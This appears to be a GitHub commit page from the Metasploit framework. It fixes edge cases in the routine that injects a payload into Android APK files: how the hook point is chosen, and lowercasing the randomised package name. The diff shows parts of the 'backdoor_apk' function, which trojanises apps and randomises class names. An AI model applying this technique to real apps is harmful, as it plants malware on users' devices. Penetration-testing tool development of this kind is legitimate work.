Skip to content

Commit d73e95e

Browse files
author
Brent Cook
committed
Land rapid7#8946, fix rapid7#8879, APK injection edge cases
2 parents e8eeb78 + c3fa307 commit d73e95e

File tree

1 file changed

+5
-2
lines changed

1 file changed

+5
-2
lines changed

lib/msf/core/payload/apk.rb

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -41,7 +41,10 @@ def find_hook_point(amanifest)
4141
application = amanifest.xpath('//application')
4242
application_name = application.attribute("name")
4343
if application_name
44-
return application_name.to_s
44+
application_str = application_name.to_s
45+
unless application_str == 'android.app.Application'
46+
return application_str
47+
end
4548
end
4649
activities = amanifest.xpath("//activity|//activity-alias")
4750
for activity in activities
@@ -221,7 +224,7 @@ def backdoor_apk(apkfile, raw_payload)
221224
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
222225

223226
package = amanifest.xpath("//manifest").first['package']
224-
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
227+
package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
225228
classes = {}
226229
classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
227230
classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize

0 commit comments

Comments
 (0)